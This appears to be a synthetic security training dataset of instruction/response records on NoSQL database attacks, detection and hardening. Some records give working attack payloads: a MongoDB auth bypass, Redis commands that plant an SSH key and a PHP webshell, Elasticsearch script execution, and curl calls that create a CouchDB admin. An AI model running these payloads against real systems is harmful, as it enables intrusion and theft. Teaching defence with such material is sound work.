+{"id": "trtp-cfc1e20ada53", "instruction": "What threats are associated with MongoDB Injection?", "output": "Attack techniques involving MongoDB Injection:\n\n- Auth bypass: {\"password\": {\"$ne\": \"\"}}\n- Data extraction: {\"$gt\": \"\"}\n- $where JavaScript injection\n- Regex-based data extraction\n- Aggregation pipeline manipulation\n\nDefenders can detect these attacks by:\n- Query operators in user input\n- JSON parsing errors\n- $where clause usage", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164923Z", "updated_at": "2025-12-17T19:35:42.164923Z"}
+{"id": "trtp-f3261740ed52", "instruction": "What indicators reveal malicious activity involving MongoDB Injection?", "output": "Methods for detecting MongoDB Injection attacks or anomalies:\n\n- Query operators in user input\n- JSON parsing errors\n- $where clause usage\n- Unusual query patterns\n- Authentication anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164935Z", "updated_at": "2025-12-17T19:35:42.164935Z"}
+{"id": "trtp-bf1af2280502", "instruction": "What preventive measures address MongoDB Injection vulnerabilities?", "output": "Security controls and preventive measures for MongoDB Injection:\n\n- Validate input types strictly\n- Disable $where if not needed\n- Use driver query builders\n- Implement schema validation\n- Sanitize JSON input\n\nMongoDB injection bypasses authentication, extracts data, and in some cases enables code execution. Developers incorrectly assume NoSQL is immune to injection. Modern frameworks may still be vulnerable.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164948Z", "updated_at": "2025-12-17T19:35:42.164948Z"}
+{"id": "trtp-6b9de40b1e73", "instruction": "What is the syntax for MongoDB Injection?", "output": "Example of MongoDB Injection:\n\n```sql\n// Authentication bypass:\n// Original: db.users.find({username: input, password: input})\n// Payload: {\"username\": \"admin\", \"password\": {\"$ne\": \"\"}}\n\n// $where injection:\ndb.users.find({$where: \"this.password.match(/^a.*/)\"})\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.164844Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.164958Z", "updated_at": "2025-12-17T19:35:42.164958Z"}
+{"id": "trtp-6c3c0b3eefbc", "instruction": "Explain MongoDB Authentication and Authorization from a security perspective.", "output": "MongoDB authentication secures database access, while role-based authorization controls permissions. Default configurations are often insecure with authentication disabled and databases exposed to the network.\n\nSecurity Relevance: MongoDB historically defaulted to no authentication, leading to thousands of exposed databases. Even with authentication, overprivileged roles enable data theft and manipulation.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166825Z", "updated_at": "2025-12-17T19:35:42.166825Z"}
+{"id": "trtp-549a7d4b924d", "instruction": "What are the main parts of MongoDB Authentication and Authorization that security teams should understand?", "output": "MongoDB Authentication and Authorization consists of the following key components:\n\n- Authentication mechanisms (SCRAM, x509)\n- Role-based access control\n- Built-in roles (read, readWrite, dbAdmin)\n- Custom roles\n- Authentication database", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166845Z", "updated_at": "2025-12-17T19:35:42.166845Z"}
+{"id": "trtp-3bd2b9d2a4f9", "instruction": "Why is MongoDB Authentication and Authorization important for database security?", "output": "MongoDB historically defaulted to no authentication, leading to thousands of exposed databases. Even with authentication, overprivileged roles enable data theft and manipulation.\n\nCommon attack vectors include:\n- Access unauthenticated MongoDB instances\n- Privilege escalation through role abuse\n- Credential brute forcing\n- Database enumeration without auth", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166860Z", "updated_at": "2025-12-17T19:35:42.166860Z"}
+{"id": "trtp-144b440675b8", "instruction": "What threats are associated with MongoDB Authentication and Authorization?", "output": "Attack techniques involving MongoDB Authentication and Authorization:\n\n- Access unauthenticated MongoDB instances\n- Privilege escalation through role abuse\n- Credential brute forcing\n- Database enumeration without auth\n\nDefenders can detect these attacks by:\n- Connections without authentication\n- Role assignment changes\n- Failed authentication attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166874Z", "updated_at": "2025-12-17T19:35:42.166874Z"}
+{"id": "trtp-7447cf434263", "instruction": "What indicators reveal malicious activity involving MongoDB Authentication and Authorization?", "output": "Methods for detecting MongoDB Authentication and Authorization attacks or anomalies:\n\n- Connections without authentication\n- Role assignment changes\n- Failed authentication attempts\n- Admin database access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166885Z", "updated_at": "2025-12-17T19:35:42.166885Z"}
+{"id": "trtp-8f3c09d630e2", "instruction": "How can organizations protect against MongoDB Authentication and Authorization?", "output": "Security controls and preventive measures for MongoDB Authentication and Authorization:\n\n- Always enable authentication\n- Use SCRAM-SHA-256\n- Apply principle of least privilege\n- Bind to localhost unless needed\n\nMongoDB historically defaulted to no authentication, leading to thousands of exposed databases. Even with authentication, overprivileged roles enable data theft and manipulation.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166897Z", "updated_at": "2025-12-17T19:35:42.166897Z"}
+{"id": "trtp-4eb34a827c85", "instruction": "What is the syntax for MongoDB Authentication and Authorization?", "output": "Example of MongoDB Authentication and Authorization:\n\n```sql\n// Enable authentication in mongod.conf:\nsecurity:\n  authorization: enabled\n\n// Create user with minimal privileges:\ndb.createUser({\n  user: \"appuser\",\n  pwd: \"strong_password\",\n  roles: [{role: \"readWrite\", db: \"appdb\"}]\n})\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-mongodb-authentication-and-authorization", "license": "original", "retrieved_at": "2025-12-17T19:35:42.166795Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.166907Z", "updated_at": "2025-12-17T19:35:42.166907Z"}
+{"id": "trtp-1c86ac9e9c51", "instruction": "How does Redis Security Vulnerabilities work and what are its security implications?", "output": "Redis is an in-memory data store often exposed without authentication. Redis commands like CONFIG, EVAL, and DEBUG enable arbitrary file writes, code execution, and system compromise.\n\nSecurity Relevance: Thousands of Redis instances are exposed on the internet without authentication. A single connection enables data theft, cryptomining, and full server compromise through known techniques.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168663Z", "updated_at": "2025-12-17T19:35:42.168663Z"}
+{"id": "trtp-b6ce52423292", "instruction": "What are the main parts of Redis Security Vulnerabilities that security teams should understand?", "output": "Redis Security Vulnerabilities consists of the following key components:\n\n- Authentication (requirepass)\n- CONFIG SET command\n- EVAL Lua scripting\n- DEBUG commands\n- Replication abuse", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168684Z", "updated_at": "2025-12-17T19:35:42.168684Z"}
+{"id": "trtp-636ea02cff26", "instruction": "Why is Redis Security Vulnerabilities important for database security?", "output": "Thousands of Redis instances are exposed on the internet without authentication. A single connection enables data theft, cryptomining, and full server compromise through known techniques.\n\nCommon attack vectors include:\n- SSH key injection\n- Webshell writing\n- Crontab injection\n- Lua code execution (EVAL)\n- Replication-based attacks", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168700Z", "updated_at": "2025-12-17T19:35:42.168700Z"}
+{"id": "trtp-d99eceed0e79", "instruction": "How do attackers abuse Redis Security Vulnerabilities?", "output": "Attack techniques involving Redis Security Vulnerabilities:\n\n- SSH key injection\n- Webshell writing\n- Crontab injection\n- Lua code execution (EVAL)\n- Replication-based attacks\n\nDefenders can detect these attacks by:\n- CONFIG SET commands\n- Unusual dir/dbfilename changes\n- EVAL execution", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168714Z", "updated_at": "2025-12-17T19:35:42.168714Z"}
+{"id": "trtp-75f6f37567b6", "instruction": "What indicators reveal malicious activity involving Redis Security Vulnerabilities?", "output": "Methods for detecting Redis Security Vulnerabilities attacks or anomalies:\n\n- CONFIG SET commands\n- Unusual dir/dbfilename changes\n- EVAL execution\n- File writes outside data directory\n- Replication configuration changes", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168727Z", "updated_at": "2025-12-17T19:35:42.168727Z"}
+{"id": "trtp-ef64b8ca485d", "instruction": "What preventive measures address Redis Security Vulnerabilities vulnerabilities?", "output": "Security controls and preventive measures for Redis Security Vulnerabilities:\n\n- Enable requirepass authentication\n- Bind to localhost only\n- Rename/disable dangerous commands\n- Use ACLs (Redis 6+)\n- Network segmentation\n\nThousands of Redis instances are exposed on the internet without authentication. A single connection enables data theft, cryptomining, and full server compromise through known techniques.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168740Z", "updated_at": "2025-12-17T19:35:42.168740Z"}
+{"id": "trtp-4d4cd196bf00", "instruction": "Provide a code example for Redis Security Vulnerabilities.", "output": "Example of Redis Security Vulnerabilities:\n\n```sql\n# SSH key injection attack:\nCONFIG SET dir /root/.ssh/\nCONFIG SET dbfilename authorized_keys\nSET payload \"\\n\\nssh-rsa AAAA... attacker@evil\\n\\n\"\nSAVE\n\n# Webshell via Redis:\nCONFIG SET dir /var/www/html/\nCONFIG SET dbfilename shell.php\nSET payload \"<?php system($_GET['c']); ?>\"\nSAVE\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-redis-security-vulnerabilities", "license": "original", "retrieved_at": "2025-12-17T19:35:42.168634Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.168750Z", "updated_at": "2025-12-17T19:35:42.168750Z"}
+{"id": "trtp-c67883b228e2", "instruction": "What do security professionals need to know about Elasticsearch Security?", "output": "Elasticsearch provides powerful search capabilities but historically lacked authentication. Injection in queries, exposed management APIs, and misconfigured clusters enable data theft and system compromise.\n\nSecurity Relevance: Elasticsearch clusters often contain sensitive data (logs, user data, analytics). Exposed clusters enable data theft. Scripting features can enable code execution.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170470Z", "updated_at": "2025-12-17T19:35:42.170470Z"}
+{"id": "trtp-0c4b7263538f", "instruction": "Describe the technical aspects of Elasticsearch Security.", "output": "Elasticsearch Security consists of the following key components:\n\n- X-Pack Security (authentication)\n- Query DSL injection\n- REST API exposure\n- Cluster management APIs\n- Script execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170511Z", "updated_at": "2025-12-17T19:35:42.170511Z"}
+{"id": "trtp-f698194802a4", "instruction": "How can Elasticsearch Security lead to database security incidents?", "output": "Elasticsearch clusters often contain sensitive data (logs, user data, analytics). Exposed clusters enable data theft. Scripting features can enable code execution.\n\nCommon attack vectors include:\n- Unauthenticated data access\n- Index enumeration\n- Script injection (older versions)\n- Cluster management manipulation\n- Snapshot theft", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170527Z", "updated_at": "2025-12-17T19:35:42.170527Z"}
+{"id": "trtp-7815eb7d427c", "instruction": "How can adversaries exploit Elasticsearch Security?", "output": "Attack techniques involving Elasticsearch Security:\n\n- Unauthenticated data access\n- Index enumeration\n- Script injection (older versions)\n- Cluster management manipulation\n- Snapshot theft\n\nDefenders can detect these attacks by:\n- Unauthenticated API access\n- Scripted query patterns\n- Bulk data access", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170542Z", "updated_at": "2025-12-17T19:35:42.170542Z"}
+{"id": "trtp-8e2462c8da35", "instruction": "What indicators reveal malicious activity involving Elasticsearch Security?", "output": "Methods for detecting Elasticsearch Security attacks or anomalies:\n\n- Unauthenticated API access\n- Scripted query patterns\n- Bulk data access\n- Management API calls\n- Unusual index access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170554Z", "updated_at": "2025-12-17T19:35:42.170554Z"}
+{"id": "trtp-fb4df138b735", "instruction": "How can organizations protect against Elasticsearch Security?", "output": "Security controls and preventive measures for Elasticsearch Security:\n\n- Enable X-Pack security\n- Disable scripting if not needed\n- Network segmentation\n- API access controls\n- Audit logging\n\nElasticsearch clusters often contain sensitive data (logs, user data, analytics). Exposed clusters enable data theft. Scripting features can enable code execution.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170566Z", "updated_at": "2025-12-17T19:35:42.170566Z"}
+{"id": "trtp-3112426598c6", "instruction": "What does Elasticsearch Security look like in SQL?", "output": "Example of Elasticsearch Security:\n\n```sql\n// Scripted field injection (older versions):\n{\n  \"script_fields\": {\n    \"pwned\": {\n      \"script\": \"java.lang.Runtime.getRuntime().exec('whoami')\"\n    }\n  }\n}\n\n// Data exfiltration query:\nGET /_all/_search?q=password:*\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-elasticsearch-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.170441Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.170576Z", "updated_at": "2025-12-17T19:35:42.170576Z"}
+{"id": "trtp-97ee90bdf2c7", "instruction": "What do security professionals need to know about CouchDB Security?", "output": "CouchDB is a document database accessible via HTTP REST API. Authentication misconfiguration, admin party mode, and view function injection create security vulnerabilities in CouchDB deployments.\n\nSecurity Relevance: CouchDB's Admin Party mode allows anyone to become admin. View functions written in JavaScript can be injected. HTTP API exposure enables easy exploitation.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172419Z", "updated_at": "2025-12-17T19:35:42.172419Z"}
+{"id": "trtp-d7143a17d77e", "instruction": "What are the main parts of CouchDB Security that security teams should understand?", "output": "CouchDB Security consists of the following key components:\n\n- Admin Party mode (no auth)\n- Cookie authentication\n- User document manipulation\n- View function injection\n- Replication security", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172440Z", "updated_at": "2025-12-17T19:35:42.172440Z"}
+{"id": "trtp-740dcf41df0d", "instruction": "What security risks are associated with CouchDB Security?", "output": "CouchDB's Admin Party mode allows anyone to become admin. View functions written in JavaScript can be injected. HTTP API exposure enables easy exploitation.\n\nCommon attack vectors include:\n- Admin Party exploitation\n- Admin credential creation\n- View function injection\n- Database enumeration\n- Replication data theft", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172454Z", "updated_at": "2025-12-17T19:35:42.172454Z"}
+{"id": "trtp-31faf020dc9d", "instruction": "What are common attack techniques involving CouchDB Security?", "output": "Attack techniques involving CouchDB Security:\n\n- Admin Party exploitation\n- Admin credential creation\n- View function injection\n- Database enumeration\n- Replication data theft\n\nDefenders can detect these attacks by:\n- Unauthenticated admin access\n- Admin creation attempts\n- View function modifications", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172468Z", "updated_at": "2025-12-17T19:35:42.172468Z"}
+{"id": "trtp-11687f51e1b7", "instruction": "How do you detect exploitation of CouchDB Security?", "output": "Methods for detecting CouchDB Security attacks or anomalies:\n\n- Unauthenticated admin access\n- Admin creation attempts\n- View function modifications\n- Unusual replication patterns\n- _config endpoint access", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172489Z", "updated_at": "2025-12-17T19:35:42.172489Z"}
+{"id": "trtp-eee1e0176db6", "instruction": "How can organizations protect against CouchDB Security?", "output": "Security controls and preventive measures for CouchDB Security:\n\n- Disable Admin Party immediately\n- Strong admin credentials\n- Bind to localhost\n- Validate view functions\n- Enable audit logging\n\nCouchDB's Admin Party mode allows anyone to become admin. View functions written in JavaScript can be injected. HTTP API exposure enables easy exploitation.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172502Z", "updated_at": "2025-12-17T19:35:42.172502Z"}
+{"id": "trtp-05801c7ad489", "instruction": "What does CouchDB Security look like in SQL?", "output": "Example of CouchDB Security:\n\n```sql\n// Check for Admin Party (no auth):\ncurl http://target:5984/_users/_all_docs\n\n// Create admin user in Admin Party:\ncurl -X PUT http://target:5984/_config/admins/hacker -d '\"password\"'\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-couchdb-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.172390Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.172512Z", "updated_at": "2025-12-17T19:35:42.172512Z"}
+{"id": "trtp-160954a04513", "instruction": "How does NoSQL Database Exposure work and what are its security implications?", "output": "NoSQL databases are frequently exposed to the internet without authentication. Shodan and similar tools reveal thousands of exposed MongoDB, Redis, Elasticsearch, and CouchDB instances containing sensitive data.\n\nSecurity Relevance: Mass exploitation of exposed NoSQL databases is common. Attackers use automated tools to find and exploit exposed instances for data theft, ransomware, and cryptomining.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174235Z", "updated_at": "2025-12-17T19:35:42.174235Z"}
+{"id": "trtp-5bae01145ba2", "instruction": "What are the main parts of NoSQL Database Exposure that security teams should understand?", "output": "NoSQL Database Exposure consists of the following key components:\n\n- Internet-facing databases\n- Default port exposure (27017, 6379, 9200)\n- Authentication disabled by default\n- Cloud misconfiguration\n- Container security gaps", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174255Z", "updated_at": "2025-12-17T19:35:42.174255Z"}
+{"id": "trtp-81ece7369701", "instruction": "What security risks are associated with NoSQL Database Exposure?", "output": "Mass exploitation of exposed NoSQL databases is common. Attackers use automated tools to find and exploit exposed instances for data theft, ransomware, and cryptomining.\n\nCommon attack vectors include:\n- Automated internet scanning\n- Data theft from exposed instances\n- Database ransom attacks\n- Cryptominer deployment\n- Data destruction/vandalism", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174271Z", "updated_at": "2025-12-17T19:35:42.174271Z"}
+{"id": "trtp-4dd37c4145f4", "instruction": "How do attackers abuse NoSQL Database Exposure?", "output": "Attack techniques involving NoSQL Database Exposure:\n\n- Automated internet scanning\n- Data theft from exposed instances\n- Database ransom attacks\n- Cryptominer deployment\n- Data destruction/vandalism\n\nDefenders can detect these attacks by:\n- External connection attempts\n- Unauthorized database access\n- Port scanning indicators", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174285Z", "updated_at": "2025-12-17T19:35:42.174285Z"}
+{"id": "trtp-8494640edf2f", "instruction": "What indicators reveal malicious activity involving NoSQL Database Exposure?", "output": "Methods for detecting NoSQL Database Exposure attacks or anomalies:\n\n- External connection attempts\n- Unauthorized database access\n- Port scanning indicators\n- Data deletion patterns\n- Cryptocurrency mining processes", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174297Z", "updated_at": "2025-12-17T19:35:42.174297Z"}
+{"id": "trtp-158083d17509", "instruction": "What security controls mitigate NoSQL Database Exposure risks?", "output": "Security controls and preventive measures for NoSQL Database Exposure:\n\n- Never expose databases to internet\n- Bind to localhost or private IPs\n- Enable authentication\n- Use firewall rules\n- Regular exposure scanning\n\nMass exploitation of exposed NoSQL databases is common. Attackers use automated tools to find and exploit exposed instances for data theft, ransomware, and cryptomining.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174309Z", "updated_at": "2025-12-17T19:35:42.174309Z"}
